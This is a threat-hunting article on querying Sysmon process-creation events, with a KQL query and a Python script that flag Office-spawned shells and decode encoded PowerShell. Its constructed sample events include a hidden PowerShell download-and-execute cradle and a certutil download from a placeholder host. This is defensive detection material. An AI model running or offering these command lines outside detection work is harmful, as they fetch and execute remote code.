Tag: Sysmon configuration

  • Practical Threat Hunting: Querying Sysmon Event ID 1

    System Monitor (Sysmon) Event ID 1 is raised from a kernel process-creation callback and records, for every process started on a Windows endpoint, the full command line, the hash of the image file on disk, and the parent process that launched it. Threat hunters query this high-fidelity telemetry to detect "Living off the Land" (LotL) techniques, fileless script execution, and payload staging that routinely bypass signature-based prevention.

    Sysmon Architecture and Kernel Interception

    Sysmon has two components: a kernel-mode driver (SysmonDrv.sys) and a user-mode service (Sysmon.exe, or Sysmon64.exe on 64-bit installs). To capture Event ID 1 (Process Creation), the driver registers a callback with the kernel through the PsSetCreateProcessNotifyRoutineEx API.

    When the kernel creates a new process, it invokes the registered callback in the context of the creating thread, before the new process's initial thread runs. The callback receives a PS_CREATE_NOTIFY_INFO structure carrying the NT path of the image file, the command line, and the process ID of the parent. Because these values come from the kernel's own bookkeeping rather than from the new process's user-mode memory (such as its PEB), a process that later rewrites its own command line or image path in user space cannot change what Sysmon recorded. The hashes (MD5, SHA1, SHA256 and IMPHASH, selected in the configuration) are computed over the image file on disk, not over process memory; the driver identifies the file that was mapped and the user-mode service hashes it after receiving the event.

    The service retrieves the queued event data from the driver through the driver's device object (DeviceIoControl requests) and emits each record through Sysmon's manifest-registered Event Tracing for Windows (ETW) provider, which lands it in the Microsoft-Windows-Sysmon/Operational event log. Event Viewer and log forwarders render the record as XML with one <Data Name="..."> element per field, which is the shape analysts query.

    Querying Event ID 1 for Execution Anomalies

    Security analysts hunt for anomalies within Event ID 1 by correlating the Image (the executing process) against its ParentImage (the process that spawned it) and inspecting the CommandLine for obfuscation or unauthorized arguments.

    Adversaries frequently use macro-enabled Office documents to spawn a command interpreter or script host. A legitimate instance of winword.exe rarely invokes powershell.exe or cmd.exe, so querying the SIEM for that parent-child relationship isolates initial-access events and macro-based droppers with little noise.

    While raw event querying enables deep forensic pivots, mature Security Operations Centers abstract these detection patterns into generalized, engine-agnostic rulesets, a methodology detailed in Threat Hunting: Using Sigma, YARA, and UBA.

    Security engineers use query languages such as Kusto Query Language (KQL) in Microsoft Sentinel or SPL in Splunk to evaluate Sysmon Event ID 1 telemetry continuously. The following KQL query, written against the Event table that the Log Analytics agent populates with forwarded Windows events, detects Office applications spawning command interpreters or script hosts. Fields are pulled out of the EventData XML by their Data Name attribute rather than by position, because the field order changes between Sysmon versions (for example, OriginalFileName was inserted ahead of CommandLine in later schemas):

```kusto
// KQL Query: Detect Suspicious Process Lineage from Microsoft Office
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
// Extract fields from the XML payload by Data Name, not by array index;
// a positional lookup silently returns the wrong field on another Sysmon version
| extend ParentImage = extract(@'<Data Name="ParentImage">([^<]*)</Data>', 1, EventData)
| extend Image = extract(@'<Data Name="Image">([^<]*)</Data>', 1, EventData)
| extend CommandLine = extract(@'<Data Name="CommandLine">([^<]*)</Data>', 1, EventData)
// Define the anomalous parent-child conditions
| where ParentImage has_any ("winword.exe", "excel.exe", "powerpnt.exe")
| where Image has_any ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe")
| project TimeGenerated, Computer, ParentImage, Image, CommandLine
| sort by TimeGenerated desc
```

    Beyond parent-child relationships, hunters scrutinize the CommandLine field for encoded payloads. Threat actors use invocations like powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand <Base64_String> to run scripts in memory without touching disk; the argument is a Base64 encoding of the UTF-16LE script text, so it can be decoded directly from the event. Note that powershell.exe accepts any unambiguous prefix of a switch (-e, -ec, -enc, -w, -ep), so a query that matches only the full switch names misses most real samples. Querying Event ID 1 for combinations of these flags, and decoding the payload, surfaces evasion attempts that a file-based scanner never sees.
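    The two hunts described above (Office parent spawning a shell, and encoded PowerShell on the command line) applied to raw Sysmon Event ID 1 records, as an added example that is not code from the page or from Sysinternals. It reads the XML that wevtutil qe Microsoft-Windows-Sysmon/Operational /f:xml emits (wrapped in a root element), looks fields up by their Data Name attribute, and decodes the -EncodedCommand payload, accepting every prefix of the switch that powershell.exe accepts. The three events, the host name and the payload are constructed samples.

```python
"""Hunt Sysmon Event ID 1 XML for Office-spawned shells and encoded PowerShell.

Added example, not code from the original page. Input is the XML produced by
`wevtutil qe Microsoft-Windows-Sysmon/Operational /f:xml`, wrapped in <Events>;
the events below are constructed samples, not real captures.
"""
import base64
import ntpath
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                  "cscript.exe", "mshta.exe"}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...), so match every prefix rather than only the full switch name.
ENC_FLAGS = {"-" + "encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)}

# Constructed payload: PowerShell expects the script as UTF-16LE, then base64.
ENC = base64.b64encode("IEX (iwr 'http://example.invalid/p')".encode("utf-16-le")).decode()

# Constructed sample events (assumed hostname WS01, assumed timestamps).
SAMPLE_EVENTS = f"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID><Computer>WS01</Computer></System>
 <EventData>
  <Data Name="UtcTime">2024-05-01 10:00:00.000</Data>
  <Data Name="Image">C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Data>
  <Data Name="CommandLine">powershell.exe -NoP -W Hidden -ep bypass -enc {ENC}</Data>
  <Data Name="ParentImage">C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID><Computer>WS01</Computer></System>
 <EventData>
  <Data Name="UtcTime">2024-05-01 10:01:00.000</Data>
  <Data Name="Image">C:\\Windows\\System32\\cmd.exe</Data>
  <Data Name="CommandLine">cmd.exe /c dir</Data>
  <Data Name="ParentImage">C:\\Windows\\explorer.exe</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID><Computer>WS01</Computer></System>
 <EventData>
  <Data Name="UtcTime">2024-05-01 10:02:00.000</Data>
  <Data Name="Image">C:\\Windows\\System32\\cmd.exe</Data>
  <Data Name="CommandLine">cmd.exe /c certutil -urlcache -f http://example.invalid/x.txt x.txt</Data>
  <Data Name="ParentImage">C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE</Data>
 </EventData>
</Event>
</Events>"""


def parse_sysmon_events(xml_text):
    """Yield Event ID 1 records as {field name: value} dicts. Fields are keyed by
    the Data Name attribute, so the field order of a given Sysmon version is irrelevant."""
    root = ET.fromstring(xml_text)
    for ev in root.findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "1":
            continue
        rec = {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)}
        rec["Computer"] = ev.findtext("e:System/e:Computer", default="", namespaces=NS)
        yield rec


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if tok.lower() in ENC_FLAGS:
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def hunt(xml_text):
    """Apply the lineage check and the encoded-command check to every record."""
    findings = []
    for rec in parse_sysmon_events(xml_text):
        parent = ntpath.basename(rec.get("ParentImage", "")).lower()
        image = ntpath.basename(rec.get("Image", "")).lower()
        reasons = []
        if parent in OFFICE_PARENTS and image in SHELL_CHILDREN:
            reasons.append(f"office app spawned shell: {parent} -> {image}")
        decoded = decode_encoded_command(rec.get("CommandLine", ""))
        if decoded is not None:
            reasons.append(f"encoded command decodes to: {decoded}")
        if reasons:
            findings.append({"computer": rec["Computer"], "time": rec.get("UtcTime", ""),
                             "parent": parent, "image": image, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["time"], hit["computer"], hit["parent"], "->", hit["image"])
        for reason in hit["reasons"]:
            print("   ", reason)
```

    Matching on the basename of Image and ParentImage rather than with substring search avoids hits on paths that merely contain "cmd.exe" (a directory named that way, or a renamed copy is a separate hunt). Decoding the payload in the pipeline, instead of only flagging the switch, lets the second-stage URL or cradle feed follow-on queries against Event ID 3 (network connection) and Event ID 22 (DNS).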

    Additional Reading

    https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
    https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreateprocessnotifyroutineex